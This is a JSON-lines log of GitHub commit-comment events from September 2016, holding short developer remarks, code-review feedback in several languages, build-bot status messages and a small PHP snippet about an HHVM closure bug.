{"id":"4559770513","type":"CommitCommentEvent","actor":{"login":"necromant2005"},"repo":{"name":"psr7-sessions/storageless"},"payload":{"comment":{"id":19012570,"position":null,"line":null,"path":null,"commit_id":"3255d7e9eb6a940536638dc3ea53044334c2b603","created_at":"2016-09-14T04:23:06Z","updated_at":"2016-09-14T04:23:06Z","body":"I've tried even harder to support hhvm, but it doesn't support closures properly\r\nhttps://travis-ci.org/necromant2005/storageless/jobs/159779640\r\n\r\n```\r\nclass A\r\n{\r\n   function boo(string $token):string\r\n   {\r\n        return (string) $token;\r\n   }\r\n\r\n   function foo(string $token) : string {\r\n        $closure = function () use ($token) : string {\r\n            return $this->boo($token);\r\n        };\r\n        return $closure();\r\n    }\r\n}\r\n\r\nvar_dump((new A())->foo('abc'));\r\n// Fatal error: syntax error, unexpected ':', expecting '{' in /tmp/x.php on line 11\r\n// even removing :string type\r\n```\r\n"}},"created_at":"2016-09-14T04:23:06Z"}
{"id":"4559777847","type":"CommitCommentEvent","actor":{"login":"Oracleman200"},"repo":{"name":"Oracleman200/dragons-of-mugloar"},"payload":{"comment":{"id":19012583,"position":null,"line":null,"path":null,"commit_id":"1565078d63c9b69d03d2ec1d85f1ee32b1b41b29","created_at":"2016-09-14T04:26:13Z","updated_at":"2016-09-14T04:26:13Z","body":" blockquote, div.yahoo_quoted { margin-left: 0 !important; border-left:1px #715FFA solid !important; padding-left:1ex !important; background-color:white !important; }  GameClient client = HttpClient.createDefault giving error(sun.net.http://www.http.httpClient is internal proprietary API and may be removed in a future release) not allowing the program to compile.\n\n\nSent from Yahoo Mail for iPad\n\n\nOn Saturday, September 3, 2016, 7:27 PM, Valentyn Kolesnikov <notifications@github.com> wrote:\n\n\nIt will be nice to rewrite Java client to php.\n\nKind regards, Valentyn\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub, or mute the thread.\n  \n \n\n"}},"created_at":"2016-09-14T04:26:13Z"}
{"id":"4559792241","type":"CommitCommentEvent","actor":{"login":"javadev"},"repo":{"name":"Oracleman200/dragons-of-mugloar"},"payload":{"comment":{"id":19012611,"position":null,"line":null,"path":null,"commit_id":"1565078d63c9b69d03d2ec1d85f1ee32b1b41b29","created_at":"2016-09-14T04:32:28Z","updated_at":"2016-09-14T04:32:28Z","body":"You may tro import HttpClient from package com.github.javadev.undescriptive.client.\r\n\r\nKind regsrds, Valentyn"}},"created_at":"2016-09-14T04:32:28Z"}
{"id":"4559795209","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19012620,"position":null,"line":null,"path":null,"commit_id":"6611430095fc82b427b1d42208d928036c9c5c44","created_at":"2016-09-14T04:33:51Z","updated_at":"2016-09-14T04:33:51Z","body":"Congtats well done!"}},"created_at":"2016-09-14T04:33:51Z"}
{"id":"4559802235","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19012634,"position":null,"line":null,"path":null,"commit_id":"5f84860065c26e07b98500ee0f60d2d2e5d8d755","created_at":"2016-09-14T04:36:54Z","updated_at":"2016-09-14T04:36:54Z","body":"I don't thinnk it's a good idea to support swapfiles in pupmode=5, to do so means that you have to have a partition mounted, having no partitions mounted is an important property of pfix=ram."}},"created_at":"2016-09-14T04:36:54Z"}
{"id":"4559802464","type":"CommitCommentEvent","actor":{"login":"foobra"},"repo":{"name":"ReactiveX/RxSwift"},"payload":{"comment":{"id":19012636,"position":null,"line":null,"path":null,"commit_id":"749800f7c326cd27b311df4c40beb2b92fa0a73d","created_at":"2016-09-14T04:36:58Z","updated_at":"2016-09-14T04:36:58Z","body":"Where is the tag?"}},"created_at":"2016-09-14T04:36:58Z"}
{"id":"4559804985","type":"CommitCommentEvent","actor":{"login":"andrew-kb"},"repo":{"name":"Karmabunny/nstrack"},"payload":{"comment":{"id":19012641,"position":null,"line":null,"path":null,"commit_id":"92c70eff71284e9f3e34e1c442869f9425b72589","created_at":"2016-09-14T04:38:08Z","updated_at":"2016-09-14T04:38:08Z","body":"🔫 excellent 🔫 !"}},"created_at":"2016-09-14T04:38:08Z"}
{"id":"4559807029","type":"CommitCommentEvent","actor":{"login":"onevcat"},"repo":{"name":"onevcat/Kingfisher"},"payload":{"comment":{"id":19012651,"position":241,"line":1962,"path":"Kingfisher.xcodeproj/project.pbxproj","commit_id":"dfda5b03406b3b1bd098d2c21c64c9ef3925fe6e","created_at":"2016-09-14T04:38:58Z","updated_at":"2016-09-14T04:38:58Z","body":"It's recommended by Xcode and it seems I can build the framework without problem (by Carthage or with submodule) without problem. It seems now the code sign is not necessary anymore when building a framework in Xcode 8."}},"created_at":"2016-09-14T04:38:58Z"}
{"id":"4559811871","type":"CommitCommentEvent","actor":{"login":"JohnKim"},"repo":{"name":"JohnKim/stalk.messenger"},"payload":{"comment":{"id":19012664,"position":null,"line":null,"path":null,"commit_id":"f6186e18b269edc5c7e4bbf067fea6e5c9a9d7ca","created_at":"2016-09-14T04:41:07Z","updated_at":"2016-09-14T04:41:07Z","body":"docker 컨테이너로 실행되도록은 했는데..\r\n가이드 작성이 필요해 보임."}},"created_at":"2016-09-14T04:41:07Z"}
{"id":"4559814149","type":"CommitCommentEvent","actor":{"login":"tycheyoung"},"repo":{"name":"tycheyoung/NerdyDerby-Laptimer"},"payload":{"comment":{"id":19012665,"position":null,"line":null,"path":null,"commit_id":"499f80ec15ae2ec2e6d73782df12c7305b97fbd2","created_at":"2016-09-14T04:42:07Z","updated_at":"2016-09-14T04:42:07Z","body":"I do not have a IR/RASER for now, so I used sonar sensor for prototype."}},"created_at":"2016-09-14T04:42:07Z"}
{"id":"4559814668","type":"CommitCommentEvent","actor":{"login":"JohnKim"},"repo":{"name":"JohnKim/stalk.messenger"},"payload":{"comment":{"id":19012667,"position":null,"line":null,"path":null,"commit_id":"ced18a777fe4ff2ea3d7feaf2f0bf1c4948d74c5","created_at":"2016-09-14T04:42:21Z","updated_at":"2016-09-14T04:42:21Z","body":"startup 실행 파일을 굳이 하나로 안해도 되긴 한데..\r\nDocker 파일 만들려는 의도도 있고 해서... "}},"created_at":"2016-09-14T04:42:21Z"}
{"id":"4559815637","type":"CommitCommentEvent","actor":{"login":"sravfeyn"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":19012672,"position":7,"line":14,"path":"corehq/apps/locations/const.py","commit_id":"9581d08f22b8645503a287256970252b39206e0f","created_at":"2016-09-14T04:42:47Z","updated_at":"2016-09-14T04:42:47Z","body":"Hey, yeah was planning to make these optional. I will do this"}},"created_at":"2016-09-14T04:42:47Z"}
{"id":"4559821604","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19012685,"position":null,"line":null,"path":null,"commit_id":"5f84860065c26e07b98500ee0f60d2d2e5d8d755","created_at":"2016-09-14T04:45:29Z","updated_at":"2016-09-14T04:45:29Z","body":"good point @gyrog.. i just disabled it\nhttps://github.com/puppylinux-woof-CE/woof-CE/commit/388b748d8fa21d513f925d8eebc925ad62274a4d\n\n@mavrothal the complete swapfile stuff was introduced in\nhttps://github.com/puppylinux-woof-CE/woof-CE/commit/f8865dd2f27f0d50d8e6c30ccc16e0482768d417\n"}},"created_at":"2016-09-14T04:45:29Z"}
{"id":"4559825026","type":"CommitCommentEvent","actor":{"login":"HMiaos"},"repo":{"name":"HMiaos/HMiaos.github.io"},"payload":{"comment":{"id":19012691,"position":15,"line":15,"path":"index.html","commit_id":"e0a697d396ccf37e5be8dbefb5bc1a13c5438f6f","created_at":"2016-09-14T04:47:01Z","updated_at":"2016-09-14T04:47:01Z","body":"sa"}},"created_at":"2016-09-14T04:47:01Z"}
{"id":"4559829189","type":"CommitCommentEvent","actor":{"login":"shans"},"repo":{"name":"w3c/css-houdini-drafts"},"payload":{"comment":{"id":19012700,"position":null,"line":null,"path":null,"commit_id":"b583bd505aca4a1a7672c38586ceba191cd7b682","created_at":"2016-09-14T04:48:52Z","updated_at":"2016-09-14T04:48:52Z","body":"resolves #250 "}},"created_at":"2016-09-14T04:48:52Z"}
{"id":"4559835002","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19012718,"position":null,"line":null,"path":null,"commit_id":"6611430095fc82b427b1d42208d928036c9c5c44","created_at":"2016-09-14T04:51:30Z","updated_at":"2016-09-14T04:51:30Z","body":"Great! Congrats!!!"}},"created_at":"2016-09-14T04:51:30Z"}
{"id":"4559835061","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19012719,"position":null,"line":null,"path":null,"commit_id":"d1330a0bfe6e42c227c3115b40299a6035bf4190","created_at":"2016-09-14T04:51:31Z","updated_at":"2016-09-14T04:51:31Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1760 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.89%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.88%25-green.svg)</a>\n"}},"created_at":"2016-09-14T04:51:31Z"}
{"id":"4559835560","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19012721,"position":122,"line":122,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T04:51:46Z","updated_at":"2016-09-14T04:51:46Z","body":"又用map，又用push，这是要闹哪样"}},"created_at":"2016-09-14T04:51:46Z"}
{"id":"4559837965","type":"CommitCommentEvent","actor":{"login":"kovidgoyal"},"repo":{"name":"atsepkov/RapydScript"},"payload":{"comment":{"id":19012723,"position":null,"line":null,"path":null,"commit_id":"de6ce95fa77d92320f8ea18cf1103561a06c68d1","created_at":"2016-09-14T04:52:53Z","updated_at":"2016-09-14T04:52:53Z","body":"If I understand this correctly, the idea here is to use type annotations to specialize certain operators like == for greater performance? Given that type annotations are not enforced, IMO, that is pretty dangerous. Just because a function parameter is annotated as being a string does not mean that the function will never be called with a number instead. Do we really want the == operator to give incorrect results in such cases? Note that in python type annotations are no-ops they do not affect the generated byte-code in any way. "}},"created_at":"2016-09-14T04:52:53Z"}
{"id":"4559838566","type":"CommitCommentEvent","actor":{"login":"DreamSeason"},"repo":{"name":"shadowsocks/luci-app-shadowsocks"},"payload":{"comment":{"id":19012724,"position":null,"line":null,"path":null,"commit_id":"181a96b5a424ff5e3443aab40df04d4c0f856393","created_at":"2016-09-14T04:53:09Z","updated_at":"2016-09-14T04:53:09Z","body":"想了解下这个功能的含义？"}},"created_at":"2016-09-14T04:53:09Z"}
{"id":"4559840241","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19012729,"position":null,"line":null,"path":null,"commit_id":"5f84860065c26e07b98500ee0f60d2d2e5d8d755","created_at":"2016-09-14T04:53:55Z","updated_at":"2016-09-14T04:53:55Z","body":"i think i should rename the script to \"pupswap\". i always come up a\nproper name when everything is already done.. i'll do that in a\nmoment.\n"}},"created_at":"2016-09-14T04:53:55Z"}
{"id":"4559842870","type":"CommitCommentEvent","actor":{"login":"JerryChin8"},"repo":{"name":"JerryChin8/Ass2"},"payload":{"comment":{"id":19012734,"position":null,"line":null,"path":null,"commit_id":"7c9279b276cee09258bc28ddf41fcaa575713833","created_at":"2016-09-14T04:55:03Z","updated_at":"2016-09-14T04:55:03Z","body":"test"}},"created_at":"2016-09-14T04:55:03Z"}
{"id":"4559846347","type":"CommitCommentEvent","actor":{"login":"mzhelskiy"},"repo":{"name":"mgp25/Instagram-API"},"payload":{"comment":{"id":19012742,"position":5,"line":1558,"path":"src/Instagram.php","commit_id":"ee350234c0cb32702969578e552737a3d7213fb7","created_at":"2016-09-14T04:56:30Z","updated_at":"2016-09-14T04:56:30Z","body":"?**&**rank_token?"}},"created_at":"2016-09-14T04:56:30Z"}
{"id":"4559848127","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19012744,"position":171,"line":171,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T04:57:20Z","updated_at":"2016-09-14T04:57:20Z","body":"_this.planMap.map每次循环都会重新获取"}},"created_at":"2016-09-14T04:57:20Z"}
{"id":"4559852294","type":"CommitCommentEvent","actor":{"login":"justin-parus"},"repo":{"name":"gapoorva/thetatauwebsite16"},"payload":{"comment":{"id":19012749,"position":null,"line":null,"path":null,"commit_id":"ef1d9d955028766a7ad91e86529ffe75449a5458","created_at":"2016-09-14T04:59:05Z","updated_at":"2016-09-14T04:59:05Z","body":"I think this service should not require the user to be logged in. E.g. If I'm using to just pull data for a user profile someone viewing that profile doesn't need to be logged in to see it (recruiter etc.). Also I just recommend we have this function take in the `userid` as a parameter rather than a global var so we can use it in context of both the user profile and the dashboard. I have these changes in my userprofile branch as of now. "}},"created_at":"2016-09-14T04:59:05Z"}
{"id":"4559852555","type":"CommitCommentEvent","actor":{"login":"imsauravsingh"},"repo":{"name":"imsauravsingh/homeo"},"payload":{"comment":{"id":19012751,"position":null,"line":null,"path":null,"commit_id":"ae6ced14b73b0492a7d50fa8eb6f3958692eca0a","created_at":"2016-09-14T04:59:12Z","updated_at":"2016-09-14T04:59:12Z","body":"done changes"}},"created_at":"2016-09-14T04:59:12Z"}
{"id":"4559856657","type":"CommitCommentEvent","actor":{"login":"Maqical"},"repo":{"name":"Maqical/Firestorm"},"payload":{"comment":{"id":19012763,"position":null,"line":null,"path":null,"commit_id":"9b08c51809cc06655d010e576ec9a5d0acc816f8","created_at":"2016-09-14T05:00:53Z","updated_at":"2016-09-14T05:00:53Z","body":"I know, but I pushed the commits I did at the time lol so I was confused what else changed.  @The-Sickness "}},"created_at":"2016-09-14T05:00:53Z"}
{"id":"4559856802","type":"CommitCommentEvent","actor":{"login":"Fasse"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":19012764,"position":87,"line":113,"path":"adm_program/system/classes/tableroles.php","commit_id":"0fae7771155b2d0c70f2b00461fbf22ada14903b","created_at":"2016-09-14T05:00:57Z","updated_at":"2016-09-14T05:00:57Z","body":"@ximex Yes this should be wrong and could be removed."}},"created_at":"2016-09-14T05:00:57Z"}
{"id":"4559861419","type":"CommitCommentEvent","actor":{"login":"gg-soeda"},"repo":{"name":"a-yamauchi217/Camp-Challenge"},"payload":{"comment":{"id":19012773,"position":null,"line":null,"path":null,"commit_id":"9566c8d211deb9fb6c83b314d6839da1cd015cc4","created_at":"2016-09-14T05:02:55Z","updated_at":"2016-09-14T05:02:55Z","body":"添田です。\r\nまず、フローチャートの分岐についてなのですが、ひし形の左側に分岐するのではなく、右側に分岐するようにお願いします。（PDF修正しなくても良いです。）\r\n　┌◇　⇒　◇┐\r\n\r\n課題9について\r\n最初に、入力値をXという箱で受けてますが、このXという箱は「TOPという文字が入っているか」のチェックの後、数字のカウントアップに利用しています。なので、できれば最初の入力値を受ける箱は別名にしたいですね。\r\n\r\n課題10について\r\nわかり辛くて申し訳ないのですが、「1に1加算してから表示」なので、数値のカウントアップのタイミングを繰り返し処理の最初に実施してください。1～7ではなく、2～7が表示される形ですね。また、偶数奇数の判定後、表示以外の処理は一緒なので、表示後の処理は１つにしても問題ありませんよ。\r\n\r\n課題11について\r\n自販機のフローとして、出来てます。時間があれば、それぞれの処理についてもっと細かく考えてみてください。"}},"created_at":"2016-09-14T05:02:55Z"}
{"id":"4559864340","type":"CommitCommentEvent","actor":{"login":"peterhgao"},"repo":{"name":"syzhao326/sfdat26_syzhao"},"payload":{"comment":{"id":19012776,"position":null,"line":null,"path":null,"commit_id":"fb1594f2e2106f4c8e0438760e0c0f5f86f6e7c4","created_at":"2016-09-14T05:04:12Z","updated_at":"2016-09-14T05:04:12Z","body":"Nice job on the homework, Shangyu!\r\n\r\nCouple points of feedback\r\n\r\n- When you do groupby, and use an aggregation function like 'mean,' generally, you can apply it directly and don't necessarily need to use lambda & apply.\r\n- For Health Dept dataset, in order to get most accurate metrics, it would help to create index columns for inspections and violations, so you can do a count distinct using nunique() on the indexes. Also, you lose some data by doing in inner join instead of left join to the violations dataset.\r\n\r\nOther than that, everything looks good!"}},"created_at":"2016-09-14T05:04:12Z"}
{"id":"4559865326","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19012778,"position":null,"line":null,"path":null,"commit_id":"6611430095fc82b427b1d42208d928036c9c5c44","created_at":"2016-09-14T05:04:38Z","updated_at":"2016-09-14T05:04:38Z","body":"Congrats too!"}},"created_at":"2016-09-14T05:04:38Z"}
{"id":"4559869931","type":"CommitCommentEvent","actor":{"login":"KillerofJoy"},"repo":{"name":"KillerofJoy/starter-web"},"payload":{"comment":{"id":19012784,"position":null,"line":null,"path":null,"commit_id":"4beb7f097b54ab7cf08daf17972c3ab14432ae24","created_at":"2016-09-14T05:06:21Z","updated_at":"2016-09-14T05:06:21Z","body":"Thanks for the input.. Digging this tutorial.."}},"created_at":"2016-09-14T05:06:21Z"}
{"id":"4559871403","type":"CommitCommentEvent","actor":{"login":"Adj1e"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":19012789,"position":null,"line":null,"path":null,"commit_id":"597d85fdfb70a923981452696a98d2734c431a86","created_at":"2016-09-14T05:06:59Z","updated_at":"2016-09-14T05:06:59Z","body":"Hy dev, \r\n\r\nMasterball is nothing. Please set value to zero. thanks for yours awesome work. "}},"created_at":"2016-09-14T05:06:59Z"}
{"id":"4559877213","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19012795,"position":243,"line":243,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T05:09:24Z","updated_at":"2016-09-14T05:09:24Z","body":"一般，两种情形下会使用when方法：\r\n1、有多个异步操作需要同时成功\r\n2、目标对象有可能是deferred对象，也有可能是非deferred对象（when方法接收到非deferred对象时，无论是1、true、0、null、undefined、\"abc\"，都会直接触发成功状态，不做任何布尔值判断）\r\n\r\n在这里，getWaveDetails方法返回的始终都是promise对象，且只有它自己，所以找不到用when方法的理由；\r\n\r\n另外，$.ajax方法本身返回的就是封装好的jQuery-Deferred对象，也看不到请求后续有新的异步操作，所以不明白为什么要用新的Deferred对象.\r\n"}},"created_at":"2016-09-14T05:09:24Z"}
{"id":"4559877291","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19012796,"position":12,"line":12,"path":"issue11/delete.php","commit_id":"71dc46a0bec5a6b5d52708d73cf7b6a2437b6224","created_at":"2016-09-14T05:09:26Z","updated_at":"2016-09-14T05:09:26Z","body":"確認ダイアログできてました！Goodだと思います！"}},"created_at":"2016-09-14T05:09:26Z"}
{"id":"4559877775","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19012797,"position":null,"line":null,"path":null,"commit_id":"00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e","created_at":"2016-09-14T05:09:39Z","updated_at":"2016-09-14T05:09:39Z","body":"5626-Plant-HX-min-DT (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T05:09:39Z"}
{"id":"4559882507","type":"CommitCommentEvent","actor":{"login":"consp1racy"},"repo":{"name":"consp1racy/android-support-preference"},"payload":{"comment":{"id":19012806,"position":null,"line":null,"path":null,"commit_id":"75dd33c59cd72c9674190d29789f715f7a42e9fe","created_at":"2016-09-14T05:11:42Z","updated_at":"2016-09-14T05:11:42Z","body":"Support repository version 38 is out."}},"created_at":"2016-09-14T05:11:42Z"}
{"id":"4559882817","type":"CommitCommentEvent","actor":{"login":"Oracleman200"},"repo":{"name":"Oracleman200/dragons-of-mugloar"},"payload":{"comment":{"id":19012807,"position":null,"line":null,"path":null,"commit_id":"1565078d63c9b69d03d2ec1d85f1ee32b1b41b29","created_at":"2016-09-14T05:11:51Z","updated_at":"2016-09-14T05:11:51Z","body":"COMPILATION ERROR : \n-------------------------------------------------------------\ndragon.java:[13,71] cannot find symbol\n  symbol:   variable $\n  location: class dragon \n\n    On Wednesday, September 14, 2016 5:32 AM, Valentyn Kolesnikov <notifications@github.com> wrote:\n \n\n You may tro import HttpClient from package com.github.javadev.undescriptive.client.Kind regsrds, Valentyn—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub, or mute the thread.  \n\n   "}},"created_at":"2016-09-14T05:11:51Z"}
{"id":"4559883205","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19012809,"position":null,"line":null,"path":null,"commit_id":"6611430095fc82b427b1d42208d928036c9c5c44","created_at":"2016-09-14T05:12:01Z","updated_at":"2016-09-14T05:12:01Z","body":"Congrats!"}},"created_at":"2016-09-14T05:12:01Z"}
{"id":"4559883284","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19012810,"position":16,"line":37,"path":"issue11/edit.php","commit_id":"71dc46a0bec5a6b5d52708d73cf7b6a2437b6224","created_at":"2016-09-14T05:12:05Z","updated_at":"2016-09-14T05:12:05Z","body":"「HTMLの中にPHPを埋め込む書き方」あっております！\r\nとてもコードがみやすくなったかと思います。"}},"created_at":"2016-09-14T05:12:05Z"}
{"id":"4559884688","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19012814,"position":267,"line":267,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T05:12:42Z","updated_at":"2016-09-14T05:12:42Z","body":"这里也可以这样写^_^：\r\n`(flag ? _this.showCircleOrPolygon : _this.HideCircleAndPolygonAndSpot)(waveList[index]);`\r\n表意更明确，代码量也少一些；当然，写if是最清楚的."}},"created_at":"2016-09-14T05:12:42Z"}
{"id":"4559884734","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19012816,"position":8,"line":15,"path":"issue11/regist.php","commit_id":"71dc46a0bec5a6b5d52708d73cf7b6a2437b6224","created_at":"2016-09-14T05:12:43Z","updated_at":"2016-09-14T05:12:43Z","body":"ここは消し忘れかも?笑"}},"created_at":"2016-09-14T05:12:43Z"}
{"id":"4559886092","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19012821,"position":null,"line":null,"path":null,"commit_id":"30bf89f3d8e564b588b8e48993e92a551b384f2c","created_at":"2016-09-14T05:13:17Z","updated_at":"2016-09-14T05:13:17Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/30bf89f3d8e564b588b8e48993e92a551b384f2c#commitcomment-19012454) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/9876f10293e4294e968165dd99075f8cf7c23366/daily_2016_9_14/report.md). cc @jrevels"}},"created_at":"2016-09-14T05:13:17Z"}
{"id":"4559886336","type":"CommitCommentEvent","actor":{"login":"jaygovindchauhan"},"repo":{"name":"jaygovindchauhan/GPRS_CLOUD"},"payload":{"comment":{"id":19012823,"position":null,"line":null,"path":null,"commit_id":"3d12c264ec1deaf0a04653f4ebff6a9d0cec6dff","created_at":"2016-09-14T05:13:24Z","updated_at":"2016-09-14T05:13:24Z","body":"for content change"}},"created_at":"2016-09-14T05:13:24Z"}
{"id":"4559886343","type":"CommitCommentEvent","actor":{"login":"gg-soeda"},"repo":{"name":"a-yamauchi217/Camp-Challenge"},"payload":{"comment":{"id":19012824,"position":null,"line":null,"path":null,"commit_id":"599beb0e44e3e45bb452f604ae4b27d2c2c6b199","created_at":"2016-09-14T05:13:24Z","updated_at":"2016-09-14T05:13:24Z","body":"添田です。\r\nバブルソートの方ですが、スライドの並び「1735」の場合は対応できているのですが、「1753」だった場合には今のフローではきちんと並びません。今のフローを1回通すと、一番大きい数字が一番右に移動するので、あとはそれを必要な回数繰り返すイメージで作成してみてください。"}},"created_at":"2016-09-14T05:13:24Z"}
{"id":"4559887146","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/wpml2mlp"},"payload":{"comment":{"id":19012826,"position":9,"line":0,"path":"assets/js/wpml_export.js","commit_id":"2732208cb886675bfe345eec9980a61e6864469e","created_at":"2016-09-14T05:13:45Z","updated_at":"2016-09-14T05:13:45Z","body":"Erm? Wuchstabrn verbechselt?"}},"created_at":"2016-09-14T05:13:45Z"}
{"id":"4559888861","type":"CommitCommentEvent","actor":{"login":"thewonderidiot"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":19012830,"position":null,"line":null,"path":null,"commit_id":"3adae84fc13e292f8dc9d171d1c18fec16540da1","created_at":"2016-09-14T05:14:31Z","updated_at":"2016-09-14T05:14:31Z","body":"Out of curiosity, what are you planning on doing with this information? \r\n\r\nI had a run-in with uninitialized accesses like this when I was first trying to get the AGC going on an FPGA. I had naively initialized all the words in my RAM to 0, completely forgetting about the parity bit. And since the AGC does a fresh start every time it reads something with bad parity, it was rebooting every few instructions, making it just a bit further each time (since the parity failing is a corrective process).\r\n\r\nI had been kind of thinking that letting it go through all that trouble at the beginning would set everything up, but then found I couldn't talk to it at all. Apparently PINBALL offends just as bad as the restart code... it took dozens of keypresses for something to finally be displayed on the DSKY. In the end I just gave up and initialized all my memory to 1."}},"created_at":"2016-09-14T05:14:31Z"}
{"id":"4559889090","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/wpml2mlp"},"payload":{"comment":{"id":19012832,"position":31,"line":0,"path":"inc/Export/AdminPage/Languages_Table.php","commit_id":"2732208cb886675bfe345eec9980a61e6864469e","created_at":"2016-09-14T05:14:38Z","updated_at":"2016-09-14T05:14:38Z","body":"esc_attr on attributes pls :)"}},"created_at":"2016-09-14T05:14:38Z"}
{"id":"4559893362","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"Fsu0413/QSanguosha-For-Hegemony"},"payload":{"comment":{"id":19012839,"position":null,"line":null,"path":null,"commit_id":"ff5a0f6545b453c4a35d7935d54d282b7f60de58","created_at":"2016-09-14T05:16:29Z","updated_at":"2016-09-14T05:16:29Z","body":"> 该不会让我写完剩下的吧……\r\n\r\n为什么不会"}},"created_at":"2016-09-14T05:16:29Z"}
{"id":"4559893629","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19012840,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T05:16:36Z","updated_at":"2016-09-14T05:16:36Z","body":"It was intended to have two or more blockers in between (for that reason I mentioned potential pinners in the docu). About direct checkers I became aware yesterday but I think they are ok because then we are in check and generate just evasion moves. Initally I did not spend much thoughts about having exact pinners because: I wanted to change/add less lines as possible and because in rare cases a potential pinner becomes real while the see- exchanges are ongoing."}},"created_at":"2016-09-14T05:16:36Z"}
{"id":"4559895501","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19012842,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T05:17:28Z","updated_at":"2016-09-14T05:17:28Z","body":"Anyway I really hope your test wiil pass"}},"created_at":"2016-09-14T05:17:28Z"}
{"id":"4559895562","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19012843,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T05:17:30Z","updated_at":"2016-09-14T05:17:30Z","body":"Anyway I really hope your test wiil pass"}},"created_at":"2016-09-14T05:17:30Z"}
